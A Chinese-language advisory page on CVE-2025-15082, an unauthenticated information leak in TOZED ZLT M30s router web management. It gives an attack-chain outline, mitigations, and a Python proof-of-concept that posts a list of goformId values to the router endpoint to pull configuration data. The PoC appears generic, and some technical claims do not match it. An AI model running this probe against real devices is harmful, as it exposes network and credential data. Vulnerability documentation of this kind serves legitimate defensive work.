TOZED ZLT M30s路由器Web管理界面信息泄露漏洞(CVE-2025-15082)

漏洞信息

漏洞编号

CVE-2025-15082

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TOZED ZLT M30s

漏洞概述

CVE-2025-15082是影响TOZED ZLT M30s路由器（1.47及之前版本）的信息泄露漏洞。该漏洞存在于Web管理界面的/reqproc/proc_post端点，攻击者可以通过操纵goformId参数未经授权访问敏感信息。由于该漏洞无需认证即可远程利用，且已公开利用代码，对使用该设备的用户构成中等安全风险。攻击者可能利用此漏洞获取设备配置信息、用户凭证或其他敏感数据，进一步进行横向移动或持久化攻击。

技术细节

该漏洞位于TOZED ZLT M30s路由器的Web管理界面组件中，具体涉及/reqproc/proc_post接口。问题出在对goformId参数的处理上，攻击者可以通过构造特定的HTTP POST请求，在goformId参数中注入特殊字符或路径遍历序列，诱导服务器返回本应受保护的敏感信息。由于Web管理界面的访问控制机制存在缺陷，攻击者无需任何认证凭证即可触发此漏洞。漏洞的CVSS向量显示攻击复杂度低（AC:L），无需认证（PR:N）和用户交互（UI:N），攻击者只需能够发送网络请求即可成功利用。机密性影响为低（C:L），表明泄露的信息量有限，但仍可能导致设备配置、网络信息或会话数据等敏感内容暴露。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标TOZED ZLT M30s路由器，确认设备在线并开放Web管理界面（通常为80或443端口）

STEP 2

步骤2

信息收集：攻击者发送HTTP请求探测/reqproc/proc_post端点，尝试不同的goformId参数值以确定可触发信息泄露的参数

STEP 3

步骤3

漏洞利用：构造包含敏感信息查询的POST请求，将恶意的goformId参数值（如getWlanSSID、getSystemInfo等）发送到目标端点

STEP 4

步骤4

数据提取：服务器未正确验证参数权限，直接返回敏感信息（如WiFi配置、系统信息、网络拓扑、用户凭证等）

STEP 5

步骤5

横向移动：利用获取的敏感信息进一步攻击，如登录管理后台、修改路由器配置、劫持网络流量或植入恶意固件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15082 PoC - TOZED ZLT M30s Information Disclosure
# Target: /reqproc/proc_post endpoint
# Affected: TOZED ZLT M30s up to version 1.47

target_ip = "192.168.1.1"  # Router IP address
target_port = 80

url = f"http://{target_ip}:{target_port}/reqproc/proc_post"

# Common goformId values that may trigger information disclosure
form_ids = [
    "getWlanSSID",
    "getNetworkConfig",
    "getSystemInfo",
    "getArpTable",
    "getDhcpClients",
    "getPortMapping",
    "getWifiClients",
    "getFirewallRules",
    "getPPPoEInfo",
    "getDeviceInfo"
]

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": f"http://{target_ip}/"
}

print(f"[*] Scanning {target_ip} for CVE-2025-15082")
print(f"[*] Target endpoint: {url}")
print("-" * 50)

for form_id in form_ids:
    data = {
        "goformId": form_id,
        "isTest": "false",
        "cmd": form_id
    }
    
    try:
        response = requests.post(url, data=data, headers=headers, timeout=5)
        
        if response.status_code == 200 and len(response.text) > 0:
            print(f"\n[+] Possible info leak with goformId={form_id}")
            print(f"    Status: {response.status_code}")
            print(f"    Response length: {len(response.text)} bytes")
            print(f"    Response preview: {response.text[:200]}...")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error with goformId={form_id}: {e}")

print("\n[*] Scan complete")
print("[*] Note: This PoC demonstrates the vulnerability pattern")
print("[*] Actual exploitation may require specific parameter values")

影响范围

TOZED ZLT M30s < 1.48

TOZED ZLT M30s 1.47及之前所有版本

防御指南

临时缓解措施

在厂商发布官方补丁之前，建议采取以下临时缓解措施：1)立即禁用路由器的远程Web管理功能，将管理界面访问限制在局域网内部；2)在边界防火墙上屏蔽对路由器管理端口（80/443）的外部访问；3)如果业务必须远程管理路由器，应通过VPN连接后访问；4)定期更换路由器管理密码，并监控是否有异常配置变更；5)考虑部署网络入侵检测系统识别针对该漏洞的探测和利用行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15082
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15082
3 Details https://www.cvedetails.com/cve/CVE-2025-15082/
4 VulDB https://vuldb.com/cve/CVE-2025-15082
5 Link https://vuldb.com/?ctiid.338410
6 Link https://vuldb.com/?id.338410
7 Link https://vuldb.com/?submit.707306
8 Link https://www.hacklab.eu.org/blogs/zlt_m30s_information_disclosure
9 Link https://youtu.be/u_H29UdiPOc